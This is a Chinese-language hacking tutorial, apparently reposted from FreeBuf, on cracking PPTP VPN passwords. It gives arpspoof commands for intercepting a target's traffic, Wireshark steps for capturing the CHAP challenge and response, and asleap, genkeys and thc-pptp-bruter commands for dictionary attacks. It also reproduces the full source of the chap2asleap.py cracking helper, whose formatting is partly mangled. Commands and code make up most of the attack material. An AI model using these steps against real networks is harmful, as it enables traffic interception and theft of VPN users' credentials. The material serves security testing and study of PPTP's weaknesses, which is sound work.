破解PPTP加密類型的VPN
責編:admin |2015-04-22 10:12:23PPTP(Point to Point Tunneling Protocol),即點對點隧道協議。該協議是在PPP協議的基礎上開發的一種新的增強型安全協議,支持多協議虛擬專用網(VPN),可以通過密碼驗證協議(PAP)、可擴展認證協議(EAP)等方法增強安全性。可以使遠程用戶通過撥入ISP、通過直接連接Internet或其他網絡安全地訪問企業網。
1.asleap+genkeys
使用的軟件是 ‘asleap+genkeys’ 套裝;這兩軟件看參數感覺很簡單的樣子,其實際使用會讓人郁悶不已:
過程是:首先抓到含有用戶名和密碼的 **.pcap 文件包,然后用 genkeys 生成 asleap 專用的字典,再用 asleap 破解這個抓到的包就ok啦!
genkeys -r wordlist.lst -f wordlist.dat -n wordlist.idx
asleap -r **.pcap -f wordlist.dat -n wordlist.idx
可實際本吊在使用的過程中asleap一直報錯:
最后發現國外有大牛寫了一個腳本用,’chap2asleap.py’ ,轉了過來,照著原文折騰下(原文地址:http://blog.g0tmi1k.com/2010/03/chap2asleappy-v011-vpn/)!
首先本機對目標主機開始arp欺騙:
arpspoof -i interface -t x.x.x.x y.y.y.y
arpspoof -i interface -t y.y.y.y x.x.x.x
接下來開始用wireshark抓包 (ps:發現網上“很久”以前的文章關于pptp抓包工具都是 anger 和 pptp-sniff ,最近找了半天也沒有找到資源,不知為什么)
wireshark -i interface -k
目標主機登錄vpn,讓 wireshark 抓到包,用 ‘chap’ 過濾下,這時我們已經可以看到明文的用戶名了,然后分別復制 Challenge 和 Response 的 value 值:
使用 ‘chap2asleap.py’ 破解密碼:
python chap2asleap.py -C Challenge_value -R Response_value -x -v -d /path/to/wordlist.lst -p /path/to/asleap
-d? #自定義字典文件,默認 /pentest/passwords/wordlists/darkc0de.lst
-p? #指定asleap所在的文件夾,默認 /usr/bin/
如下圖,破解一個自己測試密碼報錯,破解視頻里的則能成功,估計win下的加密協議加強了吧
2.thc-pptp-bruter
接上面,wireshark探測到目標連接vpn的用戶名和服務器地址之后:
thc-pptp-bruter -u username vpn服務器ip < 字典文件
cat 字典文件 | thc-pptp-bruter -u username vpn服務器ip
可選參數:
-n
-l
chap2asleap.py 腳本源碼:
#!/usr/bin/python
#———————————————————————————————-#
#chap2asleap.py v0.2 (#3 2011-04-05)?????????????????????????????????????????????????????????? #
# (C)opyright 2011 – g0tmi1k?????????????????????????????????????????????????????????????????? #
#—Important———————————————————————————-#
#???????????????????? *** Do NOT use this for illegal or malicious use ***???????????????????? #
#??????????????? By running this, YOU are using this program at YOUR OWN RISK.???????????????? #
#??????????? This software is provided “as is”, WITHOUT ANY guarantees OR warranty.??????????? #
#—Modules————————————————————————————#
import os, re, sys, hashlib, getopt, binascii, urllib2
#—Defaults———————————————————————————–#
# [/path/to/the/file] Use which file
wordlistPath = “/pentest/passwords/wordlists/darkc0de.lst”
# [/path/to/the/folder] Where is asleap?
asleapPath = “/pentest/wireless/asleap”
# [True/False] Shows more info
verbose = False
# [True/False] Runs asleap afterwords
run = False
# [True/False] Use the wordlist for the attack
wordlist = False
#—Variables———————————————————————————-#
version = “0.2 #3″
txtUser = “” # null the value
txtChal = “” # null the value
txtResp = “” # null the value
action = “33[32m[>]33[0m ”
info = “33[33m[i]33[0m ”
diag = “33[34m[+]33[0m ”
error = “33[31m[!]33[0m ”
#—-Functions———————————————————————————#
def SplitList( list, chunk_size ):
return “”.join([list[offs:offs+chunk_size] + “:” for offs in range(0, len(list), chunk_size)])
#———————————————————————————————-#
def help_message():
print “””(C)opyright 2011 g0tmi1k ~ http://g0tmi1k.blogspot.com
Usage: python chap2asleap.py [options]
Options:
-u username…??????????? — Username
-c 0123456789ABCDEF…??? — PPP CHAP Challenge (32 characters)
-r 0123456789ABCDEF…??? — PPP CHAP Response? (98 characters)
-x??????????????????????? — Runs asleap afterwards
-w??????????????????????? — Uses “Wordlist” for the attack, instead of “genkey” (Default is genkey)
-p /path/to/asleap??????? — Example: “”” + asleapPath + “””
-d /path/to/wordlist.lst? — Example: “”” + wordlistPath + “””
-h??????????????????????? — Displays this help message
-v??????????????????????? — Verbosity mode (shows more detail)
–update????????????????? — Downloads the latest version
Example:
python chap2asleap.py -u scott -c e3a5d0775370bda51e16219a06b0278f -r 84c4b33e00d9231645598acf91c384800000000000000000565fe2492fd5fb88edaec934c00d282c046227406c31609b00 -x -v
Extra Help:
Authors Page: http://www.willhackforsushi.com/Asleap.html
Blog Post: http://g0tmi1k.blogspot.com/2010/03/script-chap2asleappy.html
Video: http://g0tmi1k.blogspot.com/2010/03/video-cracking-vpn-asleap-thc-pptp.html”””
sys.exit(0)
#———————————————————————————————-#
def updateScript():
try:
rScript = urllib2.urlopen(“http://g0tmi1k.googlecode.com/svn/trunk/chap2asleap/chap2asleap.py”).read()
except:
print error + “Error: Couldn’t connect to server”
print error + “Update Failed”
sys.exit(1)
rVersion = re.findall(“version = \”\d.+\d.+\d.”, rScript.lower())
if rVersion: rVersion = rVersion[0].replace(“version = “,””).replace(“\””,””)
else:
print error + “Couldn’t detect version. Please manually update”
print error + “Update Failed”
sys.exit(1)
if version == rVersion:
print action + “Up-to-date”
else:
print action + “Updating…”
updateFile = open(“chap2asleap.py”, “w”)
updateFile.write(rScript)
updateFile.close()
print action + “Update complete”
sys.exit(1)
#—Main—————————————————————————————#
print “33[36m[*]33[0m chap2asleap v” + version + ” ~ Asleap Argument Generator”
#———————————————————————————————-#
try:
opts, args = getopt.getopt(sys.argv[1:], “u:c:r:vxwp:d:h?”, [“user=”,”challenge=”,”response=”,”path=”,”wordlist=”,”help”, “update”])
except getopt.GetoptError, err:?? # print help information and exit
print str(err)?? # will print something like “option -a not recognized”
sys.exit(0)
#if len(opts) == 0:
#??? help_message()
for o, a in opts:
if o in (“-u”, “–user”):
txtUser = a
if o in (“-c”, “–challenge”):
txtChal = a
if o in (“-r”, “–response”):
txtResp = a
if o == “-v”:
verbose = True
if o == “-x”:
run = True
if o == “-w”:
wordlist = True
if o in (“-p”, “–path”):
asleapPath = a
if o in (“-d”, “–wordlist”):
wordlistPath = a
if o in (“-h”, “–help”, “-?”):
help_message()
if o? == “–update”:
updateScript()
#———————————————————————————————-#
mainLoop = True
try:
while mainLoop:
if txtUser == “”: txtUser = raw_input(“[~] Please enter the username: “)
else: mainLoop = False
mainLoop = True
while mainLoop:
if txtChal == “”: txtChal = raw_input(“[~] Please enter the PPP CHAP Challenge: “)
txtChal = txtChal.replace(“:”, “”)
if not re.search(“[0-f]”, txtChal):
txtChal = “”
print error+”Sorry, you can’t input that for the CHAP Challenge. Only 0-9 a-f.”
elif len(txtChal) != 32:
txtChal = “”
print error+”Sorry, PPP CHAP Challenge has to be 32 bytes in length.”
else:
mainLoop = False
mainLoop = True
while mainLoop:
if txtResp == “”: txtResp = raw_input(“[~] Please enter the PPP CHAP Response: “)
txtResp = txtResp.replace(“:”, “”)
if not re.search(“[0-f]”, txtResp):
print error+”Sorry, you can’t input that for the CHAP Response. Only 0-9 a-f.”
txtResp = “”
elif len(txtResp) != 98:
print error+”Sorry, PPP CHAP Response has to be 32 bytes in length.”
txtResp = “”
else:
mainLoop = False
if asleapPath[-1:] == “/”: asleapPath = asleapPath[0:-1]
#———————————————————————————————-#
if verbose == True: print info + ”????? Username: ” + txtUser
if verbose == True: print info + “CHAP Challenge: ” + txtChal
if verbose == True: print info + ” CHAP Response: ” + txtResp
#———————————————————————————————-#
authChallenge = binascii.unhexlify(txtChal)
peerChallenge = binascii.unhexlify((txtResp)[0:32])
response = txtResp[48:96]
challenge = ((hashlib.sha1( peerChallenge + authChallenge + txtUser )).hexdigest())[0:16]
if verbose == True: print info + “Auth Challenge: ” + txtChal
if verbose == True: print info + “Peer Challenge: ” + (txtResp)[0:32]
if verbose == True: print info + ” Peer Response: ” + response
if verbose == True: print info + ”???? Challenge: ” + challenge
challenge = (SplitList (challenge,2 ))[0:-1]
response? = (SplitList (response,2 ))[0:-1]
#———————————————————————————————-#
print action+”Result:”
print “cd ” + asleapPath
if wordlist == False:
print “./genkey -r ” + wordlistPath + ” -f words.dat -n words.idx”
print “./asleap -C ” + challenge + ” -R ” + response + ” -f words.dat -n words.idx”
else:
print “./asleap -C ” + challenge + ” -R ” + response + ” -W ” + wordlistPath
#———————————————————————————————-#
if (os.path.isfile(asleapPath + “/genkeys”) and run == True):
if wordlist == False:
os.system (asleapPath + “/genkeys -r ” + wordlistPath + ” -f /tmp/words.dat -n /tmp/words.idx”)
os.system (asleapPath + “/asleap -C ” + challenge + ” -R ” + response + ” -f /tmp/words.dat -n /tmp/words.idx”)
os.remove (“/tmp/words.dat”)
os.remove (“/tmp/words.idx”)
if wordlist == True:
os.system (asleapPath + “/asleap -C ” + challenge + ” -R ” + response + ” -W ” + wordlistPath)
elif run == True:
print “alseap isn’t located: ” + asleapPath
#———————————————————————————————-#
print “33[36m[*]33[0m Done! =)”
#———————————————————————————————-#
except KeyboardInterrupt:
print “”
sys.exit(0)
文章來源:FreeBuf黑客與極客(FreeBuf.com)